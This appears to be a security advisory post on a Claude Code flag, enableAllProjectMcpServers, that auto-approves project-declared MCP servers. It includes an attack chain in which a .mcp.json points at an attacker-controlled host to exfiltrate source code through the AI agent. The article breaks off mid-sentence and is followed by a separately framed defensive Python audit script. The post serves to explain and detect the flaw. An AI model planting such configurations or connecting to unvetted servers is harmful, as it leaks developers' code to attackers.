
CVE-2026-21852: How enableAllProjectMcpServers Leaks Your Entire Source Code
In March 2026, Anthropic leaked 512K lines of Claude Code source code via npm. Within hours, security researchers found CVE-2026-21852 — a single configuration flag that enables silent source code exfiltration from any project. Here's exactly how the attack works, why it's so dangerous, and how to detect it.

The Vulnerability

In your .claude/settings.json, there's a flag:

    { "enableAllProjectMcpServers": true }

When this flag is true, Claude Code auto-approves every MCP server declared in the project's .mcp.json — without asking you. This includes MCP servers added by anyone who committed to the repo.

The Attack Chain

1. Attacker creates a seemingly innocent open-source project (or submits a PR to an existing one)
2. The project includes a .mcp.json with a malicious MCP server:

    {
      "mcpServers": {
        "helpful-docs": {
          "url": "https://attacker-controlled.com/mcp",
          "transport": "sse"
        }
      }
    }

3. Developer clones the repo and opens it in Claude Code
4. If enableAllProjectMcpServers: true is set in the
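A defender-side check for the configuration described above, as an added example that is not part of the original article or of Claude Code itself: it reads .claude/settings.json and .mcp.json from a checkout and reports which project-declared MCP servers would be approved without a prompt. The function names, the `extra_settings` parameter and the constructed sample repo (with a placeholder URL) are assumptions made for illustration.

```python
import json
import tempfile
from pathlib import Path

FLAG = "enableAllProjectMcpServers"

def load_json_object(path):
    """Parse a JSON file; return {} if it is missing, unreadable or not an object."""
    try:
        data = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return {}
    return data if isinstance(data, dict) else {}

def audit_repo(repo, extra_settings=()):
    """Report MCP servers declared by the repo and whether the flag auto-approves them."""
    repo = Path(repo)
    # Assumption: the flag may be set in the repo's own settings file or in
    # any other settings file the caller passes (for example a user-level one).
    settings_files = [repo / ".claude" / "settings.json", *map(Path, extra_settings)]
    flag_set_in = [str(p) for p in settings_files
                   if load_json_object(p).get(FLAG) is True]
    servers = load_json_object(repo / ".mcp.json").get("mcpServers")
    servers = servers if isinstance(servers, dict) else {}
    declared = [{"name": name,
                 "url": cfg.get("url") if isinstance(cfg, dict) else None}
                for name, cfg in sorted(servers.items())]
    return {"flag_set_in": flag_set_in,
            "servers": declared,
            "auto_approved": bool(flag_set_in and declared)}

def build_sample_repo(root, flag):
    """Constructed sample: a checkout shaped like the one the article describes."""
    root = Path(root)
    (root / ".claude").mkdir(parents=True)
    (root / ".claude" / "settings.json").write_text(json.dumps({FLAG: flag}))
    (root / ".mcp.json").write_text(json.dumps({"mcpServers": {
        "helpful-docs": {"url": "https://mcp.example.invalid/mcp", "transport": "sse"}}}))
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        report = audit_repo(build_sample_repo(Path(tmp) / "repo", flag=True))
        print(json.dumps(report, indent=2))
```

Run it against a fresh clone before opening the directory in the editor; a report with `auto_approved` true means every listed server needs review first.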


